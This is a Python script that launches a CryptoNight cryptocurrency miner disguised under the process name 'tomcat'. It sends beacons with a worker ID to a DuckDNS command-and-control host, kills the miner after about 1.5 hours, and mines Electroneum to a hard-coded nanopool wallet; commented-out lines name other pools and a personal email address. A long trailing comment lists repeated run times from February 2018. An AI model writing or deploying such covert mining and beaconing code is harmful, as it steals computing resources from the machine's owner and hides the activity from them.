import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:09.973739
#2018-02-17 16:27:04.890164
#2018-02-17 18:14:03.805005
#2018-02-17 20:01:06.750054
#2018-02-17 21:51:04.177850
#2018-02-17 23:36:05.033525
#2018-02-18 01:25:07.817277
#2018-02-18 03:13:02.177366
#2018-02-18 05:01:07.352872
#2018-02-18 06:53:03.976955
#2018-02-18 08:41:06.532404
#2018-02-18 10:27:05.976078
#2018-02-18 12:13:07.467941
#2018-02-18 13:59:05.514142
#2018-02-18 15:49:06.152209
#2018-02-18 17:39:07.520502
#2018-02-18 19:27:05.635944
#2018-02-18 21:12:04.853598
#2018-02-18 22:59:04.132537
#2018-02-19 00:47:04.684416
#2018-02-19 02:34:05.481472
#2018-02-19 04:20:09.333209
#2018-02-19 06:05:06.457074
#2018-02-19 07:53:03.943631
#2018-02-19 09:43:08.298849
#2018-02-19 11:33:01.606354
#2018-02-19 13:22:02.172156
#2018-02-19 15:10:02.661241
#2018-02-19 16:59:07.012482
#2018-02-19 18:47:01.295282
#2018-02-19 20:35:09.268652
#2018-02-19 22:23:07.952614
#2018-02-20 00:09:07.320678
#2018-02-20 01:57:05.761865
#2018-02-20 03:46:05.178596
#2018-02-20 05:31:06.271743
#2018-02-20 07:15:04.636859
#2018-02-20 09:01:07.411614
#2018-02-20 10:44:06.086039
#2018-02-20 12:31:01.289153
#2018-02-20 14:17:03.927083
#2018-02-20 16:01:07.866133
#2018-02-20 17:48:01.799114
#2018-02-20 19:41:09.393196
#2018-02-20 21:29:08.230423
#2018-02-20 23:13:05.841204
#2018-02-21 00:57:08.186869
#2018-02-21 02:45:08.325275
#2018-02-21 04:35:07.696915
#2018-02-21 06:25:05.151963
#2018-02-21 08:12:04.717098
#2018-02-21 09:58:06.663670
#2018-02-21 11:45:14.156435
#2018-02-21 13:36:09.209131
#2018-02-21 15:20:11.433758
#2018-02-21 17:12:04.666779
#2018-02-21 18:59:09.260441
#2018-02-21 20:47:04.319963
#2018-02-21 22:32:07.221096
#2018-02-22 00:23:04.180302
#2018-02-22 02:11:04.751481
#2018-02-22 03:58:04.303730
#2018-02-22 05:45:07.647055
#2018-02-22 07:32:05.677807
#2018-02-22 09:19:07.491521
#2018-02-22 11:06:06.108006
#2018-02-22 12:54:04.399968
#2018-02-22 14:43:09.700445
#2018-02-22 16:28:02.067156
#2018-02-22 18:16:07.002912
#2018-02-22 20:06:06.426456
#2018-02-22 21:54:01.267735
#2018-02-22 23:41:01.769357
#2018-02-23 01:27:08.604844
#2018-02-23 03:14:07.824458
#2018-02-23 05:02:02.175065
#2018-02-23 06:47:07.706575
#2018-02-23 08:40:07.916701
#2018-02-23 10:57:08.707272
#2018-02-23 12:54:04.366583
#2018-02-23 14:38:07.859106
#2018-02-23 16:27:09.254653
#2018-02-23 18:15:10.884608
#2018-02-23 20:01:08.899529
#2018-02-23 21:45:08.938572
#2018-02-23 23:41:01.878680
#2018-02-24 01:29:04.177100
#2018-02-24 03:19:04.152406
#2018-02-24 05:04:05.403618
#2018-02-24 06:54:03.736265
#2018-02-24 08:45:07.013044
#2018-02-24 10:40:03.913596
#2018-02-24 12:29:05.257820
#2018-02-24 14:20:03.079909
#2018-02-24 16:07:07.983674
#2018-02-24 17:58:05.141362
#2018-02-24 19:46:06.884636
#2018-02-24 21:32:01.854036
#2018-02-25 01:59:05.459717
#2018-02-25 05:52:04.657957
#2018-02-25 11:37:05.732918